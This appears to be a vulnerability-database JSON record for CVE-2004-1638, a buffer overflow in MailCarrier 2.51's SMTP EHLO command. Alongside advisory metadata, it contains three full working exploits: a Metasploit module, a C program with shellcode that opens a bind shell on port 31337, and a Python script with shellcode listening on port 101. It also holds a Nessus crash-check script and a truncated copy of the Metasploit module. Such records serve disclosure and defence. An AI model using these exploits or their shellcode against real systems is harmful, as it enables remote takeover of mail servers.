ID CVE-2004-1638
Type cve
Reporter cve@mitre.org
Modified 2017-07-11T01:31:00
Description
Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.
{"id": "CVE-2004-1638", "bulletinFamily": "NVD", "title": "CVE-2004-1638", "description": "Buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long (1) EHLO and possibly (2) HELO command.", "published": "2004-10-16T04:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1638", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/11535", "https://exchange.xforce.ibmcloud.com/vulnerabilities/17861", "http://marc.info/?l=bugtraq&m=109880961630050&w=2", "http://secunia.com/advisories/12999"], "cvelist": ["CVE-2004-1638"], "type": "cve", "lastseen": "2019-05-29T18:08:04", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "75b1517d39c136bc2ea56aef2a0a8c23"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "a11071654cde664199dac48330e1f990"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "734905967bbc7a4a41df0934090a199f"}, {"key": "href", "hash": "0b546f5ad974245bf8a79f389778e9a0"}, {"key": "modified", "hash": "523ab2b584257b356b93ab54fd2d1554"}, {"key": "published", "hash": "1e9de82a8b7324b199ecacaaa50513e8"}, {"key": "references", "hash": "b193581f60ad402a080c2f45a2010399"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "08285393f994ac69c03ead94b6ca4cd1"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "730703071e662c7688ca6871e652efc10e414651f79ab12f4924306c25607e9c", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:16822", "EDB-ID:598", "EDB-ID:637"]}, {"type": "nessus", "idList": ["MAILCARRIER_SMTP_OVERFLOW.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMTP/MAILCARRIER_SMTP_EHLO"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231015902"]}, {"type": "osvdb", "idList": ["OSVDB:11174"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83004"]}], "modified": "2019-05-29T18:08:04"}, "score": {"value": 8.5, "vector": "NONE", "modified": "2019-05-29T18:08:04"}, "vulnersScore": 8.5}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-02-02T06:35:20", "bulletinFamily": "exploit", "description": "TABS MailCarrier v2.51 SMTP EHLO Overflow. CVE-2004-1638. Remote exploit for windows platform", "modified": "2010-04-30T00:00:00", "published": "2010-04-30T00:00:00", "id": "EDB-ID:16822", "href": "https://www.exploit-db.com/exploits/16822/", "type": "exploitdb", "title": "TABS MailCarrier 2.51 - SMTP EHLO Overflow", "sourceData": "##\r\n# $Id: mailcarrier_smtp_ehlo.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits the MailCarrier v2.51 suite SMTP service.\r\n\t\t\t\tThe stack is overwritten when sending an overly long EHLO command.\r\n\t\t\t},\r\n\t\t\t'Author' \t => [ 'Patrick Webster <patrick[at]aushack.com>' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t[\r\n\t\t\t\t[ 'CVE', '2004-1638' ],\r\n\t\t\t\t[ 'OSVDB', '11174' ],\r\n\t\t\t\t[ 'BID', '11535' ],\r\n\t\t\t\t[ 'URL', 'http://milw0rm.com/exploits/598' ],\r\n\t\t\t],\r\n\t\t\t'Platform' => ['win'],\r\n\t\t\t'Arch'\t\t => [ ARCH_X86 ],\r\n\t\t\t'Privileged'\t\t=> true,\r\n\t\t\t'DefaultOptions'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' \t=> 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t\t=> 300,\r\n\t\t\t\t\t'BadChars' \t\t=> \"\\x00\\x0a\\x0d:\",\r\n\t\t\t\t\t'StackAdjustment'\t=> -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.\r\n\t\t\t\t\t[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63\t} ], # jmp esp expsrv.dll w2ksp0 - xpsp1\r\n\t\t\t\t\t[ 'Windows XP SP2 - EN', \t\t { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 26 2004',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(25),\r\n\t\t\t\tOpt::LHOST(), # Required for stack offset\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tbanner = sock.get_once(-1,3)\r\n\t\tdisconnect\r\n\r\n\t\tif (banner =~ /ESMTP TABS Mail Server for Windows NT/)\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = \"EHLO \" + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)\r\n\t\tsploit << [target['Ret']].pack('V') + payload.encoded\r\n\r\n\t\tsock.put(sploit + \"\\r\\n\")\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16822/"}, {"lastseen": "2016-01-31T12:35:15", "bulletinFamily": "exploit", "description": "MailCarrier 2.51 Remote Buffer Overflow Exploit. CVE-2004-1638. Remote exploit for windows platform", "modified": "2004-11-16T00:00:00", "published": "2004-11-16T00:00:00", "id": "EDB-ID:637", "href": "https://www.exploit-db.com/exploits/637/", "type": "exploitdb", "title": "MailCarrier 2.51 - Remote Buffer Overflow Exploit", "sourceData": "/* Remote exploit for MailCarrier by NoPh0BiA,\r\n\r\nno@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1\r\n**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\r\n[x] Connected to: 192.168.0.1 PORT: 25\r\n[x] Sending evil buffer..done.\r\n[x] Trying to connect to port 31337..\r\n[x] Connected to: 192.168.0.1 PORT: 31337\r\n[x] 0wn3d!\r\n\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\WINNT\\system32>\r\n\r\nGreets to NtWaK0,schap,kane,kamalo,foufs :P\r\n*/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n\r\n#define PORT 25\r\n#define RPORT 31337\r\n#define RET \"\\xD3\\x39\\xD3\\x77\" /*win2k adv server sp4*/\r\n\r\nchar shellcode[] =\r\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x4d\\x81\"\r\n\"\\x59\\x47\\x83\\xeb\\xfc\\xe2\\xf4\\xb1\\x69\\x0f\\x47\\x4d\\x81\\x0a\\x12\\x1b\"\r\n\"\\xd6\\xd2\\x2b\\x69\\x99\\xd2\\x02\\x71\\x0a\\x0d\\x42\\x35\\x80\\xb3\\xcc\\x07\"\r\n\"\\x99\\xd2\\x1d\\x6d\\x80\\xb2\\xa4\\x7f\\xc8\\xd2\\x73\\xc6\\x80\\xb7\\x76\\xb2\"\r\n\"\\x7d\\x68\\x87\\xe1\\xb9\\xb9\\x33\\x4a\\x40\\x96\\x4a\\x4c\\x46\\xb2\\xb5\\x76\"\r\n\"\\xfd\\x7d\\x53\\x38\\x60\\xd2\\x1d\\x69\\x80\\xb2\\x21\\xc6\\x8d\\x12\\xcc\\x17\"\r\n\"\\x9d\\x58\\xac\\xc6\\x85\\xd2\\x46\\xa5\\x6a\\x5b\\x76\\x8d\\xde\\x07\\x1a\\x16\"\r\n\"\\x43\\x51\\x47\\x13\\xeb\\x69\\x1e\\x29\\x0a\\x40\\xcc\\x16\\x8d\\xd2\\x1c\\x51\"\r\n\"\\x0a\\x42\\xcc\\x16\\x89\\x0a\\x2f\\xc3\\xcf\\x57\\xab\\xb2\\x57\\xd0\\x80\\xcc\"\r\n\"\\x6d\\x59\\x46\\x4d\\x81\\x0e\\x11\\x1e\\x08\\xbc\\xaf\\x6a\\x81\\x59\\x47\\xdd\"\r\n\"\\x80\\x59\\x47\\xfb\\x98\\x41\\xa0\\xe9\\x98\\x29\\xae\\xa8\\xc8\\xdf\\x0e\\xe9\"\r\n\"\\x9b\\x29\\x80\\xe9\\x2c\\x77\\xae\\x94\\x88\\xac\\xea\\x86\\x6c\\xa5\\x7c\\x1a\"\r\n\"\\xd2\\x6b\\x18\\x7e\\xb3\\x59\\x1c\\xc0\\xca\\x79\\x16\\xb2\\x56\\xd0\\x98\\xc4\"\r\n\"\\x42\\xd4\\x32\\x59\\xeb\\x5e\\x1e\\x1c\\xd2\\xa6\\x73\\xc2\\x7e\\x0c\\x43\\x14\"\r\n\"\\x08\\x5d\\xc9\\xaf\\x73\\x72\\x60\\x19\\x7e\\x6e\\xb8\\x18\\xb1\\x68\\x87\\x1d\"\r\n\"\\xd1\\x09\\x17\\x0d\\xd1\\x19\\x17\\xb2\\xd4\\x75\\xce\\x8a\\xb0\\x82\\x14\\x1e\"\r\n\"\\xe9\\x5b\\x47\\x37\\xe8\\xd0\\xa7\\x27\\x91\\x09\\x10\\xb2\\xd4\\x7d\\x14\\x1a\"\r\n\"\\x7e\\x0c\\x6f\\x1e\\xd5\\x0e\\xb8\\x18\\xa1\\xd0\\x80\\x25\\xc2\\x14\\x03\\x4d\"\r\n\"\\x08\\xba\\xc0\\xb7\\xb0\\x99\\xca\\x31\\xa5\\xf5\\x2d\\x58\\xd8\\xaa\\xec\\xca\"\r\n\"\\x7b\\xda\\xab\\x19\\x47\\x1d\\x63\\x5d\\xc5\\x3f\\x80\\x09\\xa5\\x65\\x46\\x4c\"\r\n\"\\x08\\x25\\x63\\x05\\x08\\x25\\x63\\x01\\x08\\x25\\x63\\x1d\\x0c\\x1d\\x63\\x5d\"\r\n\"\\xd5\\x09\\x16\\x1c\\xd0\\x18\\x16\\x04\\xd0\\x08\\x14\\x1c\\x7e\\x2c\\x47\\x25\"\r\n\"\\xf3\\xa7\\xf4\\x5b\\x7e\\x0c\\x43\\xb2\\x51\\xd0\\xa1\\xb2\\xf4\\x59\\x2f\\xe0\"\r\n\"\\x58\\x5c\\x89\\xb2\\xd4\\x5d\\xce\\x8e\\xeb\\xa6\\xb8\\x7b\\x7e\\x8a\\xb8\\x38\"\r\n\"\\x81\\x31\\xb7\\xc7\\x85\\x06\\xb8\\x18\\x85\\x68\\x9c\\x1e\\x7e\\x89\\x47\";\r\n\r\n\r\nstruct sockaddr_in hrm,lar;\r\n\r\nvoid shell(int sock)\r\n{\r\n fd_set fd_read;\r\n char buff[1024];\r\n int n;\r\n \r\n while(1) {\r\n FD_SET(sock,&fd_read);\r\n FD_SET(0,&fd_read);\r\n \r\n if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n \r\n if( FD_ISSET(sock, &fd_read) ) {\r\n n=read(sock,buff,sizeof(buff));\r\n if (n == 0) {\r\n printf (\"Connection closed.\\n\");\r\n exit(EXIT_FAILURE);\r\n } else if (n < 0) {\r\n perror(\"read remote\");\r\n exit(EXIT_FAILURE);\r\n }\r\n write(1,buff,n);\r\n }\r\n \r\n if ( FD_ISSET(0, &fd_read) ) {\r\n if((n=read(0,buff,sizeof(buff)))<=0){\r\n perror (\"read user\");\r\n exit(EXIT_FAILURE);\r\n }\r\n write(sock,buff,n);\r\n }\r\n }\r\n close(sock); \r\n}\r\nint conn(char *ip,int port)\r\n{\r\n\tint sockfd;\r\n\thrm.sin_family = AF_INET;\r\n\thrm.sin_port = htons(port);\r\n\thrm.sin_addr.s_addr = inet_addr(ip);\r\n\tbzero(&(hrm.sin_zero),8);\r\n\tsockfd = socket(AF_INET,SOCK_STREAM,0);\r\nif((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)\r\n\t{\r\n\tperror(\"connect\");\r\n\texit(0);\r\n\t}\r\n\tprintf(\"[x] Connected to: %s PORT: %d\\n\",ip,port);\r\n\treturn sockfd;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tchar *buffer = malloc(5530),*crap = malloc(32),*t;\r\n\tint x,y;\r\n\tif(argc<2)\r\n\t{\r\n\tprintf(\"Usage: TargetIP.\\n\");\r\n\texit(0);\r\n\t}\r\n\tprintf(\"**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\\n\");\r\n\tt=argv[1];\r\n\tmemset(buffer,'\\0',5530);\r\n\tmemset(crap,0x41,32);\r\n\tmemset(buffer,0x90,5095);\r\n\tstrcat(buffer,RET);\r\n\tstrcat(buffer,crap);\r\n\tstrcat(buffer,shellcode);\r\n\tx = conn(t,PORT);\r\n\tprintf(\"[x] Sending evil buffer..\");\r\n\tsleep(3);\r\n\twrite(x,\"EHLO \",5);\r\n\tsleep(1);\r\n\twrite(x,buffer,5530);\r\n\twrite(x,\"\\r\\n\\r\\n\",4);\r\n\tsleep(2);\r\n\tclose(x);\r\n\tprintf(\"done.\\n\");\r\n\tprintf(\"[x] Trying to connect to port 31337..\\n\");\r\n\ty = conn(t,RPORT);\r\n\tprintf(\"[x] 0wn3d!\\n\");\r\n\tprintf(\"\\r\\n\");\r\n\tshell(y);\r\n\t\t\r\n}\n\n// milw0rm.com [2004-11-16]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/637/"}, {"lastseen": "2016-01-31T12:31:12", "bulletinFamily": "exploit", "description": "MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit. CVE-2004-1638. Remote exploit for windows platform", "modified": "2004-10-26T00:00:00", "published": "2004-10-26T00:00:00", "id": "EDB-ID:598", "href": "https://www.exploit-db.com/exploits/598/", "type": "exploitdb", "title": "MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit", "sourceData": "#########################################################\r\n# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow \t#\r\n# Advanced, secure and easy to use FTP Server. \t \t#\r\n# 23 Oct 2004 - muts \t#\r\n#########################################################\r\n# D:\\BO>mailcarrier-2.5-EHLO.py \t#\r\n#########################################################\r\n# D:\\data\\tools>nc -v 192.168.1.32 101\t\t\t#\r\n# localhost [127.0.0.1] 101 (hostname) open\t\t#\r\n# Microsoft Windows 2000 [Version 5.00.2195]\t\t#\r\n# (C) Copyright 1985-2000 Microsoft Corp.\t\t#\r\n# C:\\WINNT\\system32>\t\t\t\t\t#\r\n#########################################################\r\n\r\nimport struct\r\nimport socket\r\n\r\nprint \"\\n\\n###############################################\"\r\nprint \"\\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow\"\r\nprint \"\\nFound & coded by muts [at] whitehat.co.il\"\r\nprint \"\\nFor Educational Purposes Only!\\n\" \r\nprint \"\\n\\n###############################################\"\r\n\r\ndef make_overflow_dummy(overflow_len, retaddr):\r\n return 'A' * overflow_len + struct.pack('<L', retaddr)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nsc2 = \"\\xEB\"\r\nsc2 += \"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\nsc2 += \"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\r\nsc2 += \"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\r\nsc2 += \"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\r\nsc2 += \"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\r\nsc2 += \"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\r\nsc2 += \"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\r\nsc2 += \"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\r\nsc2 += \"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\r\nsc2 += \"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\r\nsc2 += \"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\r\nsc2 += \"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\r\nsc2 += \"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\r\nsc2 += \"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\r\nsc2 += \"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\r\nsc2 += \"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\r\nsc2 += \"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\r\nsc2 += \"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\r\nsc2 += \"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\r\nsc2 += \"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\r\nsc2 += \"\\x58\\x68\\x61\\x63\\x6B\\x90\"\r\n\r\n# Change RET address as need be.\r\n\r\n#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\\x90' * 32 + sc2 # RET Win2000 SP4 ENG\r\nbuffer = make_overflow_dummy(5097, 0x7d17dd13) + '\\x90' * 32 + sc2 #RET WinXP SP2 ENG\r\n\r\ntry:\r\n\tprint \"\\nSending evil buffer...\"\r\n\ts.connect(('127.0.0.1',25))\r\n\ts.send('EHLO ' + buffer + '\\r\\n')\r\n\tdata = s.recv(1024)\r\n\ts.close()\r\n\tprint \"\\nDone! Try connecting to port 101 on victim machine.\"\r\nexcept:\r\n\tprint \"Could not connect to SMTP!\"\r\n\r\n# milw0rm.com [2004-10-26]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/598/"}], "nessus": [{"lastseen": "2019-02-21T01:08:17", "bulletinFamily": "scanner", "description": "The target is running at least one instance of MailCarrier in which the SMTP service suffers from a buffer overflow vulnerability. By sending an overly long EHLO command, a remote attacker can crash the SMTP service and execute arbitrary code on the target.", "modified": "2018-11-15T00:00:00", "id": "MAILCARRIER_SMTP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15902", "published": "2004-12-03T00:00:00", "title": "MailCarrier < 3.0.1 SMTP EHLO Command Remote Overflow", "type": "nessus", "sourceData": "#\n# This script was written by George A. Theall, <theall@tifaware.com>.\n#\n# See the Nessus Scripts License for details.\n#\n\n# Changes by Tenable:\n# - Revised plugin title, output formatting (9/13/09)\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(15902);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2004-1638\");\n script_bugtraq_id(11535);\n\n script_name(english:\"MailCarrier < 3.0.1 SMTP EHLO Command Remote Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SMTP server is affected by a remote command execution\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The target is running at least one instance of MailCarrier in which \nthe SMTP service suffers from a buffer overflow vulnerability. By \nsending an overly long EHLO command, a remote attacker can crash the \nSMTP service and execute arbitrary code on the target.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2004/Oct/283\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MailCarrier 3.0.1 or greater.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TABS MailCarrier v2.51 SMTP EHLO Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/12/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/10/26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for SMTP Buffer Overflow Vulnerability in MailCarrier\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 George A. Theall\");\n script_family(english:\"SMTP problems\");\n script_dependencie(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nhost = get_host_name();\nport = get_service(svc:\"smtp\", default: 25, exit_on_fail: 1);\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\ndebug_print(\"searching for SMTP Buffer Overflow vulnerability in MailCarrier on \", host, \":\", port, \".\\n\");\n\nbanner = get_smtp_banner(port:port);\ndebug_print(\"banner =>>\", banner, \"<<.\\n\");\nif (\"TABS Mail Server\" >!< banner) exit(0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\n\n# It's MailCarrier and the port's open so try to overflow the buffer.\n#\n# nb: this just tries to overflow the buffer and crash the service\n# rather than try to run an exploit, like what muts published\n# as a PoC on 10/23/2004. I've verified that buffer sizes of\n# 1032 (from the TABS LABS update alert) and 4095 (from \n# smtp_overflows.nasl) don't crash the service in 2.5.1 while\n# one of 5100 does so that what I use here.\nc = 'EHLO ' + crap(length:5100, data:\"NESSUS\") + '\\r\\n';\ndebug_print(\"C: \", c);\nsend(socket:soc, data:c);\nrepeat {\n s = recv_line(socket: soc, length:32768);\n debug_print(\"S: \", s);\n}\nuntil (s !~ '^[0-9][0-9][0-9]-');\nif (!s) {\n close(soc);\n debug_print(\"trying to reopen socket.\\n\");\n if (service_is_dead(port: port, exit: 1) > 0)\n security_hole(port);\n exit(0);\n}\nsmtp_close(socket: soc);\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in MailCarrier. The server fails to properly check bounds on HELO and EHLO commands, resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code with the privileges of the running daemon.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in MailCarrier. The server fails to properly check bounds on HELO and EHLO commands, resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code with the privileges of the running daemon.\n## References:\nVendor URL: http://www.tabslab.com/en/product/mailcarrier20/\nSecurity Tracker: 1011939\n[Secunia Advisory ID:12999](https://secuniaresearch.flexerasoftware.com/advisories/12999/)\nPacket Storm: http://packetstormsecurity.org/0410-exploits/mailcarrier.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0274.html\nISS X-Force ID: 17861\n[CVE-2004-1638](https://vulners.com/cve/CVE-2004-1638)\n", "modified": "2004-10-26T11:35:50", "published": "2004-10-26T11:35:50", "href": "https://vulners.com/osvdb/OSVDB:11174", "id": "OSVDB:11174", "title": "MailCarrier HELO/EHLO Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:16", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83004/TABS-MailCarrier-v2.51-SMTP-EHLO-Overflow.html", "id": "PACKETSTORM:83004", "type": "packetstorm", "title": "TABS MailCarrier v2.51 SMTP EHLO Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow', \n'Description' => %q{ \nThis module exploits the MailCarrier v2.51 suite SMTP service. \nThe stack is 